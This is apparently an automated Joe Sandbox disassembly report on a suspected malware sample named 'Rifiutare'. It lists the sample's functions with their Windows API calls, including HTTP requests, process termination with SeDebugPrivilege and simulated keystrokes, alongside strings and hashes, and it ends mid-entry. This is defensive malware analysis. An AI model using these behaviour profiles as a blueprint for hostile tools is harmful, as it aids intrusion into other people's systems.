Part of subcall function 00C62DE8: GetLastError.KERNEL32(?,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?,?), ref: 00C62E10

_free.LIBCMT ref: 00C630C0
_free.LIBCMT ref: 00C630CB
_free.LIBCMT ref: 00C630D6
_free.LIBCMT ref: 00C630E1
_free.LIBCMT ref: 00C630EC
_free.LIBCMT ref: 00C630F7
_free.LIBCMT ref: 00C63102
_free.LIBCMT ref: 00C6310D
_free.LIBCMT ref: 00C6311B

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b6d3f4051babf556d712def0f9b81902251e2711030454c9f31b4b0ea43d8b8c
Instruction ID: 0032c3fb7b2d58077b3c00d862b7257bd4e8cf1a7bea60f00387f5eaa4a1f599
Opcode Fuzzy Hash: b6d3f4051babf556d712def0f9b81902251e2711030454c9f31b4b0ea43d8b8c
Instruction Fuzzy Hash: 71117276500508BFCB21EF94CC82CDD7BB5EF05390B9141A5FA489B232DA32EE51EB81

Function 00CA85F1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CA87AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00CA87C2
GetFileAttributesW.KERNEL32(?), ref: 00CA87EC
SetFileAttributesW.KERNEL32(?,00000000), ref: 00CA8806
SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8818
SetCurrentDirectoryW.KERNEL32(?), ref: 00CA8861
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CA88B1

Strings

*.*, xrefs: 00CA8867

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 5613cf6899eacf92661759db31d01127edfcf3936c0a008e99141c7f07f3bbb9
Instruction ID: e57a144acb59a6efbc012612f28850b5562e1daf8c39b21271e024f9fde87709
Opcode Fuzzy Hash: 5613cf6899eacf92661759db31d01127edfcf3936c0a008e99141c7f07f3bbb9
Instruction Fuzzy Hash: 9B81A1725043429BDB24EF15C444AAEB3E8BF86318F54482EF895D7251DF34DE49CB92

Function 00C3698D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00C36A1D

Part of subcall function 00C36AAD: GetClientRect.USER32(?,?), ref: 00C36AD3
Part of subcall function 00C36AAD: GetWindowRect.USER32(?,?), ref: 00C36B14
Part of subcall function 00C36AAD: ScreenToClient.USER32(?,?), ref: 00C36B3C

GetDC.USER32 ref: 00C75960
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C75973
SelectObject.GDI32(00000000,00000000), ref: 00C75981
SelectObject.GDI32(00000000,00000000), ref: 00C75996
ReleaseDC.USER32(?,00000000), ref: 00C7599E
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C75A2F

Strings

U, xrefs: 00C758FE

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: cb96962691d93cda8df8e5fffd3b733c40602d06b7dc67dcd21c2b876509f674
Instruction ID: 90336e91849850564b298d492d2d6f872b6e980c342f56f7251aa83676113f11
Opcode Fuzzy Hash: cb96962691d93cda8df8e5fffd3b733c40602d06b7dc67dcd21c2b876509f674
Instruction Fuzzy Hash: 9E71D331500605EFCF218F64C885BBA7BB5FF49320F14C269ED6A5A2A6D7718D42EF60

Function 00CACA86 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CACAA5
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CACACD
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CACAFD
GetLastError.KERNEL32 ref: 00CACB55
SetEvent.KERNEL32(?), ref: 00CACB69
InternetCloseHandle.WININET(00000000), ref: 00CACB74

Strings

, xrefs: 00CACAEE

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 90c59393d9936e9b14814ded8662cb7ec8d2de8a14c7b105d9e0aa71e3476d8c
Instruction ID: c0177673f8e5ba34ba6e8d79679bdf4131b9d25059a05e4ccfb2ed1b944ec4a8
Opcode Fuzzy Hash: 90c59393d9936e9b14814ded8662cb7ec8d2de8a14c7b105d9e0aa71e3476d8c
Instruction Fuzzy Hash: 803178B1500309AFD7219F65D889FABBBFCEB4AB48B10452AF457D2200DB35DE04AB70

Function 00C9A072 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C73B35,?,?,Bad directive syntax error,00CCDBF4,00000000,00000010,?,?), ref: 00C9A093
LoadStringW.USER32(00000000,?,00C73B35,?), ref: 00C9A09A

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C9A15E

Strings

Line %d:, xrefs: 00C9A0E9
%s (%d) : ==> %s.: %s %s, xrefs: 00C9A0C8
Line %d (File "%s"):, xrefs: 00C9A104
., xrefs: 00C9A144
Error: , xrefs: 00C9A12C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 02b8367066d160ad70705a18e3154ad368ba0da57ebe4845b82ccd7bee401c7f
Instruction ID: 96b8d0f3faef8a5e084776d560db5c4a44434a940940aff81e55d05452ecfffe
Opcode Fuzzy Hash: 02b8367066d160ad70705a18e3154ad368ba0da57ebe4845b82ccd7bee401c7f
Instruction Fuzzy Hash: C821A37185021EFBCF15AF90CC4AFEE7779BF18304F044469F516620A2DA71AA28EB51

Function 00C9289F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C928AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00C928C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C9294D

Strings

list, xrefs: 00C9292F
largeicons, xrefs: 00C928E1
smallicons, xrefs: 00C92915
SHELLDLL_DefView, xrefs: 00C928CC
details, xrefs: 00C928FB

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 37fa8865406338fbbe939fd10493e0e01cf47e637d2b5ad635c22619c6f9e78b
Instruction ID: fa06596f1a08452a0baa3095f2f5dbf8ed5645a0f2695839fe75732fca0947a1
Opcode Fuzzy Hash: 37fa8865406338fbbe939fd10493e0e01cf47e637d2b5ad635c22619c6f9e78b
Instruction Fuzzy Hash: 9F110A7B24430BBAFE052721DC0FDB777ACAB05735F210032FA44E50D1EAA199816618

Function 00C6D2B0 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00C6D2D7
_free.LIBCMT ref: 00C6D342
_free.LIBCMT ref: 00C6D368
_free.LIBCMT ref: 00C6D391
_free.LIBCMT ref: 00C6D3C9
_free.LIBCMT ref: 00C6D3FA
_free.LIBCMT ref: 00C6D43B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00C6D4BC
_free.LIBCMT ref: 00C6D4D5

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: cc1ffc53dd5fe51a3b3de772701784d30643f3e8a1b60ebfbcd261b601fc210a
Instruction ID: 7e30beaa874bd89eacf3a65f28e1d1163470d7da089ddc361eb90af544008030
Opcode Fuzzy Hash: cc1ffc53dd5fe51a3b3de772701784d30643f3e8a1b60ebfbcd261b601fc210a
Instruction Fuzzy Hash: C961F471F00B05ABDB31AF7488C1A7D7BA4AF01350F14426DF956E73A1EA319E0297A1

Function 00CC57B0 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00CC5862
ShowWindow.USER32(?,00000000), ref: 00CC58A3
ShowWindow.USER32(?,00000005,?,00000000), ref: 00CC58A9
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00CC58AD

Part of subcall function 00CC75A1: DeleteObject.GDI32(00000000), ref: 00CC75CD

GetWindowLongW.USER32(?,000000F0), ref: 00CC58E9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC58F6
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CC5929
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00CC5963
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00CC5972

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 098204e191840f9a7d09fa9035d274811c23f3851fdd881decd7923c98b977e8
Instruction ID: 24e9c3273b7c453da024e343dae2e9138e54aa7fa28a4ca85e2d1b3c0494bead
Opcode Fuzzy Hash: 098204e191840f9a7d09fa9035d274811c23f3851fdd881decd7923c98b977e8
Instruction Fuzzy Hash: 9B518030A91A08FFEF309F19CC49F993B65EB04360F14415AF925961E1C775BAD1EB41

Function 00C315EB Relevance: 13.7, APIs: 9, Instructions: 160windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C72B05
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C72B27
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C72B3F
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C72B5D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C72B7E
DestroyIcon.USER32(00000000,?,?,?,?,?,00C3143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00C72B8D
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C72BAA
DestroyIcon.USER32(00000000,?,?,?,?,?,00C3143A,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00C72BB9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 4ff874f8f805d0e6876d68b05065c7af6d41c3f037cdda4420d629116f104394
Instruction ID: c8771e0510a9343b7577134f7d4d709c1e18b7daf99fe68ac83e08d696ab29d1
Opcode Fuzzy Hash: 4ff874f8f805d0e6876d68b05065c7af6d41c3f037cdda4420d629116f104394
Instruction Fuzzy Hash: 7D517A70610209EFDB20DF65DC86FAA7BB9EB48710F144528F956D72A0D770EE90DB60

Function 00CAC976 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CAC9B5
GetLastError.KERNEL32 ref: 00CAC9C8
SetEvent.KERNEL32(?), ref: 00CAC9DC

Part of subcall function 00CACA86: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CACAA5
Part of subcall function 00CACA86: GetLastError.KERNEL32 ref: 00CACB55
Part of subcall function 00CACA86: SetEvent.KERNEL32(?), ref: 00CACB69
Part of subcall function 00CACA86: InternetCloseHandle.WININET(00000000), ref: 00CACB74

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 9eb87119031acf788e8e054284c2cbeca580a83b1c3250c81e5eb8e197d7b226
Instruction ID: f7451f70a73077a5a0b1d56138e938296722e8294c3470d7ba9ef54d74e4956b
Opcode Fuzzy Hash: 9eb87119031acf788e8e054284c2cbeca580a83b1c3250c81e5eb8e197d7b226
Instruction Fuzzy Hash: 93315E7150170AAFDB218F75DC84B7ABBF8FF4A304B048529F956C2610D731DD11ABA0

Function 00C92DA2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C94251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9426B
Part of subcall function 00C94251: GetCurrentThreadId.KERNEL32 ref: 00C94272
Part of subcall function 00C94251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C92DB3), ref: 00C94279

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C92DBD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C92DDB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C92DDF
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C92DE9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C92E01
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C92E05
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C92E0F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C92E23
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C92E27

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a128cf3c7990963d3bceabbe1935149c8af73fd000edd7742098e792761a3bde
Instruction ID: 2d6221b85e0844c1ef3dac749359e535fafdfa150307b00c741477bcb653a90b
Opcode Fuzzy Hash: a128cf3c7990963d3bceabbe1935149c8af73fd000edd7742098e792761a3bde
Instruction Fuzzy Hash: 8F0128307806107BFB106768CCCEF5D3F59EF49B12F110015F319AE0E0C9E25400DA69

Function 00C9207D Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C91CC3,?,?,00000000), ref: 00C92086
HeapAlloc.KERNEL32(00000000,?,00C91CC3,?,?,00000000), ref: 00C9208D
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C91CC3,?,?,00000000), ref: 00C920A2
GetCurrentProcess.KERNEL32(?,00000000,?,00C91CC3,?,?,00000000), ref: 00C920AA
DuplicateHandle.KERNEL32(00000000,?,00C91CC3,?,?,00000000), ref: 00C920AD
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C91CC3,?,?,00000000), ref: 00C920BD
GetCurrentProcess.KERNEL32(00C91CC3,00000000,?,00C91CC3,?,?,00000000), ref: 00C920C5
DuplicateHandle.KERNEL32(00000000,?,00C91CC3,?,?,00000000), ref: 00C920C8
CreateThread.KERNEL32(00000000,00000000,00C920EE,00000000,00000000,00000000), ref: 00C920E2

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ffa74d26459e7f169a35dbbd5cedfe0b636a5dbcc2cc1c683cc3ca3cf10191da
Instruction ID: b3235a6a3bd73126d1ec0f3a048a3fc67c7893d8b0796462a826c64db4df7ab3
Opcode Fuzzy Hash: ffa74d26459e7f169a35dbbd5cedfe0b636a5dbcc2cc1c683cc3ca3cf10191da
Instruction Fuzzy Hash: 2601BBB5240348BFE710ABA5DC4DF6F7BACEB88711F058425FA05DB1A1CA70D800CB20

Function 00CBA854 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00C9DC3E: CreateToolhelp32Snapshot.KERNEL32 ref: 00C9DC63
Part of subcall function 00C9DC3E: Process32FirstW.KERNEL32(00000000,?), ref: 00C9DC71
Part of subcall function 00C9DC3E: CloseHandle.KERNEL32(00000000), ref: 00C9DD49

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBA8DF
GetLastError.KERNEL32 ref: 00CBA8F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBA925
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CBA9DA
GetLastError.KERNEL32(00000000), ref: 00CBA9E5
CloseHandle.KERNEL32(00000000), ref: 00CBAA36

Strings

SeDebugPrivilege, xrefs: 00CBA901

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 6e2144696bcfc649221e414a0146a23b222a293b97ba7e8e702df11907fb7734
Instruction ID: dab478789be323b155071ecb902339fce90752fc66885661c718ae3c647495a7
Opcode Fuzzy Hash: 6e2144696bcfc649221e414a0146a23b222a293b97ba7e8e702df11907fb7734
Instruction Fuzzy Hash: 0961C230204242AFD720DF15C594F6ABBE0AF44318F19849CE4A68FBA3C775ED45DB92

Function 00C9C4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C9C56F
IsMenu.USER32(00000000), ref: 00C9C58F
CreatePopupMenu.USER32 ref: 00C9C5C5
GetMenuItemCount.USER32(017B4310), ref: 00C9C616
InsertMenuItemW.USER32(017B4310,?,00000001,00000030), ref: 00C9C63E

Strings

0, xrefs: 00C9C51A
2, xrefs: 00C9C5A9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: cb57c74da126f1930d59172c7eef70afd1185e4d4f8ee2f0952535141c5f99b6
Instruction ID: 833f4336be136717433f089e89cd9a2946f11303df3b55e308d829208a9e4014
Opcode Fuzzy Hash: cb57c74da126f1930d59172c7eef70afd1185e4d4f8ee2f0952535141c5f99b6
Instruction Fuzzy Hash: 6C519DB0A00345EBDF10CF68D9C8BAEBBF4AF59354F248129F426E7291D7709A41DB61

Function 00C9CFCA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C9D069

Strings

blank, xrefs: 00C9CFEB
info, xrefs: 00C9D00A
warning, xrefs: 00C9D052
question, xrefs: 00C9D022
stop, xrefs: 00C9D03A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: b5c383c633e6cc9d2c51830282c8998c4f2ccc7820bf667cd54c88d3f91ff264
Instruction ID: eb64796d53097d71b56d526da634871659981dec01cae4e6140e4acdcc6e4d57
